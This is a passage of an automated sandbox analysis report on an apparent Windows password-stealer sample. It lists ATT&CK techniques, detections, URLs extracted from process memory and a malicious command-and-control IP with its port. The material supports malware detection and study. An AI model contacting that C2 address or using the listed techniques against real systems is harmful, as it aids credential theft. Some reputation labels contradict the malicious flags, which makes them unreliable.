                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
                      Obfuscated Files or Information                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials135
                      System Information Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe30%VirustotalBrowse
                      SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id90%URL Reputationsafe
                      http://tempuri.org/Entity/Id80%URL Reputationsafe
                      http://tempuri.org/Entity/Id50%URL Reputationsafe
                      http://tempuri.org/Entity/Id40%URL Reputationsafe
                      http://tempuri.org/Entity/Id70%URL Reputationsafe
                      http://tempuri.org/Entity/Id60%URL Reputationsafe
                      http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id200%URL Reputationsafe
                      http://tempuri.org/Entity/Id210%URL Reputationsafe
                      http://tempuri.org/Entity/Id220%URL Reputationsafe
                      http://tempuri.org/Entity/Id230%URL Reputationsafe
                      http://tempuri.org/Entity/Id240%URL Reputationsafe
                      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                      193.106.191.138:327960%URL Reputationsafe
                      193.106.191.138:327960%URL Reputationsafe
                      http://tempuri.org/Entity/Id100%URL Reputationsafe
                      http://tempuri.org/Entity/Id110%URL Reputationsafe
                      http://tempuri.org/Entity/Id120%URL Reputationsafe
                      http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id130%URL Reputationsafe
                      http://tempuri.org/Entity/Id140%URL Reputationsafe
                      http://tempuri.org/Entity/Id150%URL Reputationsafe
                      http://tempuri.org/Entity/Id160%URL Reputationsafe
                      http://tempuri.org/Entity/Id170%URL Reputationsafe
                      http://tempuri.org/Entity/Id180%URL Reputationsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id190%URL Reputationsafe
                      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id23Response0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      193.106.191.138:32796true
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/02/sc/sctvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/chrome_newtabvbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/Entity/Id12Responsevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Entity/Id2Responsevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id21Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id9vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faulthvbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id8vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id5vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Preparevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id4vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id7vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id6vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id19Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencevbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id15Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registervbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id6Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.ip.sb/ipSecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe, 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2004/04/scvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id9Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id20vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Entity/Id21vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Entity/Id22vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://tempuri.org/Entity/Id23vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id24vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Entity/Id24Responsevbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/Entity/Id1Responsevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=vbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedvbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Replayvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegovbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binaryvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingvbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trustvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://tempuri.org/Entity/Id10vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id11vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id12vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id16Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/Id13vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id14vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id15vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id16vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/Noncevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id17vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id18vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id5Responsevbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id19vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsvbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://tempuri.org/Entity/Id10Responsevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Renewvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Entity/Id8Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentityvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://search.yahoo.com?fr=crmas_sfpfvbc.exe, 00000002.00000002.423894970.0000000007996000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404603370.0000000008754000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.404090422.0000000008685000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.408056557.000000000880D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405554878.000000000883F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.405444480.0000000008822000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.421928279.0000000007730000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.407871530.00000000087F0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.403947258.0000000008668000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.406589920.000000000897E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1vbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/Entity/Id23Responsevbc.exe, 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419721126.00000000074E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/06/addressingexvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoorvbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/Noncevbc.exe, 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  193.106.191.138
                                                                                                                                                  		unknownRussian Federation
                                                                                                                                                  		42238BOSPOR-ASRUtrue

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                  Analysis ID:756115
                                                                                                                                                  Start date and time:2022-11-29 16:49:14 +01:00
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 7m 41s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Number of analysed new started processes analysed:5
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
